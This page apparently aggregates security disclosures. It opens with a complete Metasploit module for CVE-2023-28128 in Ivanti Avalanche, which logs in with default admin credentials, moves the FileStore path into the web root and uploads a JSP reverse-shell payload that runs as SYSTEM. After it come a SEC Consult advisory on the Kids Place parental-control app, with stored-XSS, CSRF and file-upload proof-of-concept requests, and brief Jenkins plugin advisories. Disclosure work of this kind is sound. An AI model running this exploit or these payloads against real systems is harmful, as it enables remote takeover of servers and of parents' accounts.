Ivanti Avalanche versions prior to 6.4.0.186 permits MS-DOS style short names in the configuration path for the Central FileStore. Because of this, an administrator can change the default path to the web root of the applications, upload a JSP file, and achieve remote command execution as NT AUTHORITY\SYSTEM.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti Avalanche FileStoreConfig File Upload',        'Description' => %q{          Ivanti Avalanche prior to v6.4.0.186 permits MS-DOS style short          names in the configuration path for the Central FileStore. Because of          this, an administrator can change the default path to the web root          of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM.        },        'License' => MSF_LICENSE,        'Author' => [          'Piotr Bazydlo', # @chudypb - Vulnerability Discovery          'Shelby Pace' # Metasploit module        ],        'References' => [          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-456/'],          ['URL', 'https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US'],          ['URL', 'https://attackerkb.com/topics/jcdcN9SN9V/cve-2023-28128'],          ['CVE', '2023-28128']        ],        'Platform' => ['win', 'java'],        'Privileged' => true,        'Arch' => ARCH_JAVA,        'Targets' => [          [ 'Automatic Target', { 'DefaultOptions' => { 'Payload' => 'java/jsp_shell_reverse_tcp' } }]        ],        'DisclosureDate' => '2023-04-24',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('USERNAME', [ true, 'User name to log in with', 'amcadmin' ]),        OptString.new('PASSWORD', [ true, 'Password to log in with', 'admin' ]),        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/AvalancheWeb' ])      ]    )  end  def check    # Cleanup should not be needed after doing just a check.    @cleanup_needed = false    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'login.jsf'),      'method' => 'GET'    )    return CheckCode::Unknown('Failed to receive a response from the application') unless res    unless res.body.include?('Avalanche - User Login')      return CheckCode::Safe('Application does not appear to be Ivanti Avalanche')    end    html = res.get_html_document    elem = html.search('link')&.find { |link| link&.at('@href')&.text&.match(/\d+\.\d+\.\d+\.\d{1,4}/) }    return CheckCode::Detected('Couldn\'t retrieve element containing Avalanche version') unless elem    version = elem&.at('@href')&.value&.match(/(\d+\.\d+\.\d+\.\d{1,4})/)    return CheckCode::Detected('Failed to retrieve software version') unless version && version.length >= 2    version = version[1]    vprint_status("Version of Ivanti Avalanche appears to be v#{version}")    ver_no = Rex::Version.new(version)    patched_version = Rex::Version.new('6.4.0.186')    if ver_no >= patched_version      CheckCode::Safe('Target has been patched!')    elsif ver_no < patched_version      CheckCode::Appears('Target appears to be running an unpatched version of Ivanti Avalanche!')    else      CheckCode::Unknown("This should never be hit! Some error occurred when grabbing the target version: #{ver_no}")    end  end  def authenticate    if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank?      fail_with(Failure::BadConfig, 'Please set the USERNAME and PASSWORD options')    end    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'login.jsf'),      'method' => 'GET',      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Avalanche - User Login')    html = res.get_html_document    view_state = get_view_state(html)    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after browsing to the login page.') unless view_state    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'login.jsf'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => {        'loginForm' => 'loginForm',        'j_idt8' => '',        'loginField' => datastore['USERNAME'],        'passwordField' => datastore['PASSWORD'],        'TextCaptchaAnswer' => '',        'javax.faces.ViewState' => view_state,        'loginTableButton' => 'loginTableButton'      }    )    unless res&.code == 302 && res&.headers&.dig('Location')&.include?('inventory.jsf')      fail_with(Failure::UnexpectedReply, 'Login failed')    end  end  def get_view_state(html)    view_state = html.xpath("//input[@name='javax.faces.ViewState']")&.first&.at('@value')&.text    view_state  end  def configure_filestore    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),      'method' => 'GET',      'keep_cookies' => true    )    unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first      fail_with(Failure::UnexpectedReply, 'Failed to access FileStore configuration')    end    html = res.get_html_document    view_state = get_view_state(html)    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state from FileStoreConfig page') unless view_state    @original_config_path = html.xpath("//input[@id='txtUncPath']")&.first&.at('@value')&.text    fail_with(Failure::UnexpectedReply, 'Unable to grab FileStore path') unless @original_config_path    print_status("Original FileStore config path: '#{@original_config_path}'")    # determine drive letter    drive_letter = @original_config_path.match(/([a-zA-Z])(:|\$)/)    fail_with(Failure::UnexpectedReply, 'Couldn\'t determine drive letter for path') unless drive_letter&.length&.>= 3    drive_letter = drive_letter[1]    new_config_path = "#{drive_letter}:\\PROGRA~1\\Wavelink\\AVALAN~1\\Web"    print_status("Changing FileStore config path to '#{new_config_path}'")    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => {        'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',        'formFileStoreConfig' => 'formFileStoreConfig',        'txtUncPath' => new_config_path,        'txtVelocityFolder' => '',        'javax.faces.ViewState' => view_state      }    )    input_field_html = res&.get_html_document&.xpath('//input[@id="txtUncPath"]')&.first    if input_field_html.blank?      fail_with(Failure::UnexpectedReply, 'Did not receive a response containing the expected txtUncPath input field!')    elsif input_field_html[:value] != new_config_path      fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path')    end  end  def get_directory_val(res, dir_name)    html = res.get_html_document    results = html.xpath('//tr[contains(@class, "DIRECTORY")]')    fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results    expand_dir = results.find { |result| result.at('td')&.text&.strip == dir_name }    fail_with(Failure::UnexpectedReply, "Failed to find the '#{dir_name}' directory to write to") unless expand_dir    data_rk = expand_dir.at('@data-rk')&.value    fail_with(Failure::UnexpectedReply, "Failed to get value to expand #{dir_name} directory") unless data_rk    data_rk  end  def expand_folder(data_rk, view_state)    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => {        'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',        'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',        'fileStoreTree_dlgFileStoreTree' => 'fileStoreTree_dlgFileStoreTree',        'fileStoreTree_dlgFileStoreTree_expand' => data_rk,        'javax.faces.ViewState' => view_state      }    )  end  def select_folder(data_rk, view_state)    @cleanup_needed = true    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' =>      {        'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',        'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',        'javax.faces.behavior.event' => 'select',        'javax.faces.partial.event' => 'select',        'fileStoreTree_dlgFileStoreTree_instantSelection' => data_rk,        'form_filestore_tree' => 'form_filestore_tree',        'fileStoreTree_dlgFileStoreTree_selection' => data_rk,        'javax.faces.ViewState' => view_state      }    )  end  def upload_payload    payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.jsp"    # need to 'select' webapps/AvalancheWeb to upload a file    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),      'method' => 'GET',      'keep_cookies' => true    )    fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first    web_data_rk = get_directory_val(res, 'webapps')    view_state = get_view_state(res.get_html_document)    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after accessing the updated FileStore page') unless view_state    res = expand_folder(web_data_rk, view_state)    fail_with(Failure::UnexpectedReply, 'Did not receive response from \'webapps\' expansion') unless res    avalanche_data_rk = get_directory_val(res, 'AvalancheWeb')    view_state = get_view_state(res.get_html_document)    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after getting the directory value for AvalancheWeb') unless view_state    res = select_folder(avalanche_data_rk, view_state)    fail_with(Failure::UnexpectedReply, 'Did not receive response from \'AvalancheWeb\' selection') unless res    view_state = get_view_state(res.get_html_document)    fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after selecting the AvalancheWeb folder') unless view_state    boundary = "#{'-' * 4}WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"    post_data = "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"upload-form\"\r\n\r\n"    post_data << "upload-form\r\n"    post_data << "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n\r\n"    post_data << "#{view_state}\r\n"    post_data << "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.ajax\r\n\r\n"    post_data << "true\r\n"    post_data << "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.execute\"\r\n\r\n"    post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"    post_data << "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"javax.faces.source\"\r\n\r\n"    post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"    post_data << "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.render\"\r\n\r\n"    post_data << "fileStoreTree_dlgFileStoreTree managementBtns addFolderDialog_dlgFileStoreTree renameItemDialog_dlgFileStoreTree confirmDeleteItemDialog_dlgFileStoreTree importMessages\r\n"    post_data << "--#{boundary}\r\n"    post_data << "Content-Disposition: form-data; name=\"importFileStoreItemPanel_dlgFileStoreTree\"; filename=\"#{payload_name}\"\r\n"    post_data << "Content-Type: application/octet-stream\r\n\r\n"    post_data << "#{payload.encoded}\r\n"    post_data << "--#{boundary}--\r\n"    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),      'method' => 'POST',      'keep_cookies' => true,      'data' => post_data,      'headers' => {        'Accept' => 'application/xml, text/xml, */*; q=0.01',        'Faces-Request' => 'partial/ajax',        'X-RequestedWith' => 'XMLHttpRequest',        'Content-Type' => "multipart/form-data; boundary=#{boundary}",        'Accept-Encoding' => 'gzip, deflate'      }    )    fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res&.body&.include?("Imported file #{payload_name}")    print_good("Successfully uploaded '#{payload_name}'")    payload_name  end  def cleanup    if @cleanup_needed == false      return    end    restore_msg = 'Please manually restore FileStore config via Tools -> Central FileStore -> Configurations.'    print_status('Attempting to restore config path')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),      'method' => 'GET',      'keep_cookies' => true    )    unless res      print_error("Could not access FileStore config. #{restore_msg}")      return    end    html = res.get_html_document    view_state = get_view_state(html)    unless view_state      print_error("Failed to get view state. #{restore_msg}")      return    end    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => {        'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',        'formFileStoreConfig' => 'formFileStoreConfig',        'txtUncPath' => @original_config_path,        'txtVelocityFolder' => '',        'javax.faces.ViewState' => view_state      }    )    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),      'method' => 'GET',      'keep_cookies' => true    )    unless res&.body&.include?(@original_config_path)      print_warning("Failed to restore the FileStore config path to its original path. #{restore_msg}")      return    end    print_good('Successfully restored the FileStore config path')  end  def exploit    # Starting off we shouldn't need cleanup, however if we get to the point were we start    # to change config settings then we will need to clean that up.    @cleanup_needed = false    authenticate    configure_filestore    payload_name = upload_payload    register_file_for_cleanup("webapps/#{payload_name}")    send_request_cgi(      'uri' => normalize_uri(target_uri.path, payload_name.gsub('jsp', 'jsf')), # bypasses the app's filter, but is still resolved by java faces servlet      'method' => 'GET',      'keep_cookies' => true    )  endend

Ivanti Avalanche FileStoreConfig Shell Upload

Kiddoware Kids Place Parental Control Android App versions 3.8.49 and below suffer from weak hashing, cross site request forgery, cross site scripting, and arbitrary file upload vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20230515-0 >  
=======================================================================  
               title: Multiple Vulnerabilities  
             product: Kiddoware Kids Place Parental Control Android App  
  vulnerable version: <=3.8.49  
       fixed version: 3.8.50 or higher  
          CVE number: CVE-2023-28153, CVE-2023-29078, CVE-2023-29079  
              impact: High  
            homepage: https://kiddoware.com  
               found: 2022-09-29  
                  by: Fabian Densborn (Office Vienna)  
                      Bernhard Gründling (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult.  
                      SEC Consult is part of Eviden, an atos business  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Kiddoware is the world’s leading parental control solutions company  
with a wide range of products and  serving over 5 million families  
worldwide. Kiddoware is committed in helping you to protect your kids  
while providing you intelligence to be proactive about your childs’  
online activities."

Source: https://kiddoware.com/

Business recommendation:  
------------------------  
The vendor provides an update for the affected version(s) which  
should be installed immediately.

An in-depth security analysis performed by security professionals is  
highly advised, to identify and resolve potential further critical security  
issues.

The issues identified in this application were part of our blog post  
"The hidden costs of parental control apps" published a few months ago:  
https://r.sec-consult.com/parents

Vulnerability overview/description:  
-----------------------------------  
1) Login and registration returns password as MD5 hash  
Login and registration requests return the unsalted MD5 hash  
of the password. This indicates that the passwords are stored  
in an insecure format at the server. Furthermore, MD5 hashing  
should not be used anymore in modern applications.

2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)  
The customizable name of the child's device can be used to  
trigger a XSS payload in the parent web dashboard. Children  
might be able to attack their parents' account.

3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)  
All requests in the web dashboard are vulnerable to CSRF attacks.  
The requests contain the device Id of the child device which must  
be known to the attacker in order to successfully attack a child.  
But the device Id is not considered a secret, as it is used in  
the URL in some requests. An attacker could have obtained the Id  
through the browser history.

4) Arbitrary File Upload to AWS S3 bucket  
The web dashboard lets parents send files to the child's device.  
The selected file is uploaded to an AWS S3 bucket and the returned  
URL will be transmitted to the device which will then download it.  
It is possible to send arbitrary files to the child's device and  
thereby upload arbitrary files (size restriction ~10MB) to the  
AWS S3 bucket. The returned link is publicly available, so it is  
possible to use the server to spread malware.

5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)  
The child can remove all restrictions temporarily without the parents noticing.

Proof of concept:  
-----------------  
1) Login and registration returns password as MD5 hash  
The "Change password" request looks as follows:  
--------------------------------------------------------------------------------  
POST /account/change_password/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Cookie: [...]  
[...]

old_password=c869123c&new_password=password&confirm_password=password  
--------------------------------------------------------------------------------

The response from the web server contains the hashed, unsalted password:  
--------------------------------------------------------------------------------  
{  
  "error":null,  
  "result":  
    {  
      "email":"xxxxx@example.com",  
      "hashed_password":"5f4dcc3b5aa765d61d8327deb882cf99",  
      "message":"Password successfully changed!"  
    },  
  "status":200  
}  
--------------------------------------------------------------------------------

Proving this is an unsalted MD5 hash:

$ echo -n "password" | md5sum -t  
5f4dcc3b5aa765d61d8327deb882cf99  -

2) Stored XSS via device name in parent Dashboard (CVE-2023-29079)  
The device name can be changed by the child's account by sending a POST request  
to the API with the pushDeviceConfig method. The following payload can be used as  
a PoC to trigger an alert box on every page the device name is visible in the  
parent dashboard. Children/attackers would be able to take over their parents'  
accounts via this attack.

--------------------------------------------------------------------------------  
POST /v2/api/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Content-Type: application/json; charset=utf-8  
Content-Length: 461  
Accept-Encoding: gzip, deflate  
User-Agent: okhttp/3.12.8  
Connection: close

{  
     "method":"pushDeviceConfig",  
     "id":null,  
     "params":["a28fd8c5-2dcd-11ed-8a7f-0217330f2cf9",  
     {  
         "isGPSEnabled":false,"deviceGCMRegID":"",  
         "deviceUserAgeRange":3,  
         "deviceName":"\"><img src=x onerror=\"alert(1)\"/>",  
         [...]  
     }  
}  
--------------------------------------------------------------------------------

3) Possible CSRF attacks in parent Dashboard (CVE-2023-29078)  
As an example, an attacker can abuse the CSRF vulnerability to download an  
arbitrary file to a child's device. It is simply needed to create a form which  
automatically submits on page load. If a parent is logged in the web dashboard  
and visits this malicious site, the authenticated request will be sent and the  
file specified in the URL parameter will be downloaded by the child's device.

--------------------------------------------------------------------------------  
POST /account/push_content/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Cookie: [...]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: https://kidsplace.kiddoware.com  
Content-Length: 75  
Connection: close

url=https%3A%2F%2Fgoogle.de%2Findex.html&message=&deviceID=XXXXXXX  
--------------------------------------------------------------------------------

4) Arbitrary File Upload to AWS S3 bucket  
The web dashboard lets parents upload arbitrary files to the Kiddoware AWS S3 bucket  
and push it to the child device.  
--------------------------------------------------------------------------------  
POST /account/push_content_file/ HTTP/1.1  
Host: kidsplace.kiddoware.com  
Cookie: [...]  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Content-Type: multipart/form-data; boundary=---------------------------27687116714103572458683268551  
Origin: https://kidsplace.kiddoware.com  
Content-Length: 296  
[...]

-----------------------------27687116714103572458683268551  
Content-Disposition: form-data; name="push_file"; filename="eicar.com.txt"  
Content-Type: text/plain

<eicar-file>  
-----------------------------27687116714103572458683268551--  
--------------------------------------------------------------------------------

The upload of the eicar file worked without errors and could subsequently also be  
downloaded  via the returned link. So there is no antivirus scan on the uploaded files.

5) Disable Child App Restriction without Parent's notice (CVE-2023-28153)  
The child can disable the restrictions of the application without the parents noticing.  
For this, the following steps are necessary:  
a) If Android settings are blocked, reboot into Android Safe Mode.  
b) Disable "Display over other apps" Permission for the app in Android settings.  
c) After rebooting into normal mode, the child device can be used without restrictions.

For example, previously locked apps can now be used. To notice the problem, the parent  
has to check the parent's dashboard manually, a notification is not sent. If the child  
turns the permission back on in the meantime, the bypass will go unnoticed.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and downloaded through Google Play store, which was  
the most recent version available at the time of the test:  
* 3.8.45

Later on, version 3.8.49 (2022-10-25) has been verified to be vulnerable as well.

Vendor contact timeline:  
------------------------  
2022-11-23: Contacting vendor through kiddoware@kiddoware.com and support@kiddoware.com  
             Asking for security contact.  
2022-11-23: Response received, requesting advisory to be submitted to an employee mail.  
             No encryption demanded. Advisory sent to vendor.  
2022-11-28: Vendor informs about ongoing backend rewrites and removing some  
             upload functionalities. Some fixes will be live by Q1 2023.  
             Everything will be addressed by end of 01-04-2023.  
2022-12-15: SEC Consult informs about upcoming blog post about parental control apps.  
2022-12-15: Vendor states that most of the issues have already been fixed.  
2022-12-16: Recheck of vulnerabilities shows that not all vulnerabilities  
             have been sufficiently addressed. Vendor was informed.  
2022-12-16: Vendor explains what security measures will be implemented and  
             informs SEC Consult as soon as this is done.  
2022-12-30: Vendor informs that fixes for the found vulnerabilities have been published.  
2023-01-11: SEC Consult rechecks the vulnerabilities and found out that the applied  
             patches are not sufficient. Again, informs the vendor about it.  
2023-02-14: No response from vendor, reminder sent.  
2023-02-14: Vendor informs SEC Consult that all issues have been resolved.  
2023-03-10: Requesting CVE numbers.  
2023-03-12: Assigned CVE number for "Disable child restriction" finding.  
2023-03-31: Assigned CVE numbers for XSS and CSRF findings.  
2023-05-15: Public release of security advisory.

Solution:  
---------  
The vendor provides a patched version which should be installed immediately through Google  
Play store.  
* Version: 3.8.50 or higher

Workaround:  
-----------  
No workaround available.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult is part of Eviden, an atos business  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part  
of Eviden, an atos business. It ensures the continued knowledge gain of SEC  
Consult in the field of network and application security to stay ahead of the  
attacker. The SEC Consult Vulnerability Lab supports high-quality penetration  
testing and the evaluation of new offensive and defensive technologies for our  
customers. Hence our customers obtain the most current information about  
vulnerabilities and valid recommendation about the risk profile of new  
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF F. Densborn, B. Gründling / @2023

Kiddoware Kids Place Parental Control Android App 3.8.49 XSS / CSRF / File Upload

Jenkins HashiCorp Vault Plugin 360.v0a_1c04cf807d and earlier does not properly mask (i.e., replace with asterisks) credentials in the build log when push mode for durable task logging is enabled.

CVE-2023-33001: Jenkins Security Advisory 2023-05-16

Jenkins WSO2 Oauth Plugin 1.0 and earlier does not invalidate the previous session on login.

CVE-2023-33005: Jenkins Security Advisory 2023-05-16

Jenkins SAML Single Sign On(SSO) Plugin 2.0.2 and earlier does not perform hostname validation when connecting to miniOrange or the configured IdP to retrieve SAML metadata, which could be abused using a man-in-the-middle attack to intercept these connections.

CVE-2023-32993: Jenkins Security Advisory 2023-05-16

Jenkins CAS Plugin 1.6.2 and earlier does not invalidate the previous session on login.

CVE-2023-32997: Jenkins Security Advisory 2023-05-16

A cross-site request forgery (CSRF) vulnerability in Jenkins WSO2 Oauth Plugin 1.0 and earlier allows attackers to trick users into logging in to the attacker's account.

CVE-2023-33006: Jenkins Security Advisory 2023-05-16

Jenkins TestComplete support Plugin 2.8.1 and earlier does not escape the TestComplete project name, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2023-33002: Jenkins Security Advisory 2023-05-16

A missing permission check in Jenkins AppSpider Plugin 1.0.15 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified username and password.

CVE-2023-32999: Jenkins Security Advisory 2023-05-16

Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.149 and earlier does not mask credentials displayed on the configuration form, increasing the potential for attackers to observe and capture them.

Tag

#js